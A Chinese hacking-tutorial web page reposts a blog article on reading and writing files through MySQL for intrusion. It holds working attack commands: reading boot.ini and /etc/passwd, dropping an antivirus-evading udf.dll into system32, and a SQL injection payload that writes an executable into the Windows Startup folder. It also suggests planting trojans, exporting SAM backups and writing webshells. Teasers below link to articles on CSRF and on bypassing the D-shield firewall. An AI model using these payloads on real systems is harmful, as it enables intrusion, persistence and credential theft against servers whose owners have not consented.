建站极客  
                        网络安全                          黑客教程                          正文 
                     
                 
                
                    mysql 读取文件的几种方式及应用                 
                
                    所属分类:
                        网络安全  / 黑客教程                      
                    阅读数:
                        123 
                    
                        
                                 
                             收藏 0
                                 
                             赞 0
                                 
                             分享 
                    
                 
                
                    章出处:C.R.S.T  作者:sai52[B.H.S.T]  blog:www.sai52.com  今天朋友问我如何在mysql下读取文件,把我问愣了,发现自己还是犯了不求甚解的毛病,因此特地查了下mysql使用手册。  思路都一样,在拥有file权限的前提下,读取文件为字符串形式插入表中,然后读出表中数据,只是方式略有不同  mysql3.x下  不确定mysql3.x下能否使用load_file()函数(我在mysql3使用手册上没有查到,但貌似是可以的),用 load data infile 读取文件,命令如下  mysql>create table a (cmd text);  mysql>load data infile 'c:\\boot.ini' into table a;  mysql>select * from a;  mysql4.x下  mysql4.x下除了 load data infile 外还可以用大家熟知的 load_file() 来读取,命令如下  mysql>create table a (cmd text);  mysql>insert into a (cmd) values (load_file('c:\\boot.ini'));  mysql>select * from a;  mysql5.x下  在linux下,mysql5.x 除了上面两种方法,还可以利用 system 直接执行系统命令的方式来读取文件(是否必须root身份不确定,未测试),命令如下  mysql>system cat /etc/passwd  mysql下读取文件在入侵中用到的时候不多,可能用于查询配置文件寻找web路径,或者webshell权限很小的时候读取其他格式的webshell内容然后用into outfile方式写入大马等,二进制文件也可以这样用,只是多了hex()和unhex()的工序。  例:把免杀过的udf.dll文件插入系统目录  create table a (cmd LONGBLOB);  insert into a (cmd) values (hex(load_file('c:\\windows\\temp\\udf.dll')));  SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\udf.dll';  其他的利用方法也很多,如把木马文件写入启动项,或者把加工过的cmd.exe文件导出到系统根目录下,把sam备份导出到可读目录等等,注入中理论上应该也可以这样用(在不知道web路径又可以导出文件的情况下),大家自由发挥吧。  注入中的语法  [Copy to clipboard] [ - ]CODE:  id=xxx and 1=2 union select 1,2,3,unhex(mm.exe的十六进制),5 INTO DUMPFILE 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/mm.exe'/*  测试后发现注入中运用不太现实,因为要导出二进制文件要求必须数据类型为blob或longblob,现实中极少用到。                                    
             
            
                
                CSRF的攻击方式详解 黑客必备知识 CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF
                    评论 0 
                    
                         
                     收藏 0
                         
                     赞 0
                         
                     分享
抓取管理员hash值(哈希)的另类方法 哈希算法将任意长度的二进制值映射为固定长度的较小二进制值,这个小的二进制值称为哈希值。哈希值是一段数据唯一且极其紧凑的数值表示形式。如果散列一段明文而且哪怕只更改该段落的一个字母,随后的哈希都将产生不同的值。要找到散列为同一个值的两个不同的输入,在计
                    评论 0 
                    
                         
                     收藏 0
                         
                     赞 0
                         
                     分享
网站安全教程 绕过D盾进行注入的方法(图文教程) D盾_IIS防火墙专为IIS设计的一个主动防御的保护软件,以内外保护的方式 防止网站和服务器给入侵,在正常运行各类网站的情 况下,越少的功能,服务器越安全的理念而设计! 限制了常见的入侵方法,让服务器更安全!
                    评论 0 
                    
                         
                     收藏 0
                         
                     赞 0
                         
                     分享
局域网安全教程 HSRP攻击和防范的方法介绍(图文教程) 热备份路由器协议(HSRP)的设计目标是支持特定情况下 IP 流量失败转移不会引起混乱、并允许主机使用单路由器,以及即使在实际第一跳路由器使用失败的情形下仍能维护路由器间的连通性。换句话说,当源主机不能动态知道第一跳路由器的 IP 地址时,HSRP 协议能够保护第一
                    评论 0 
                    
                         
                     收藏 0
                         
                     赞 0
                         
                     分享
SQL通用防注入系统asp版漏洞 今晚群里朋友叫看个站,有sql防注入,绕不过,但是有发现记录wrong的文件sqlin.asp。
                    评论 0 
                    
                         
                     收藏 0
                         
                     赞 0
                         
                     分享
                 查看更多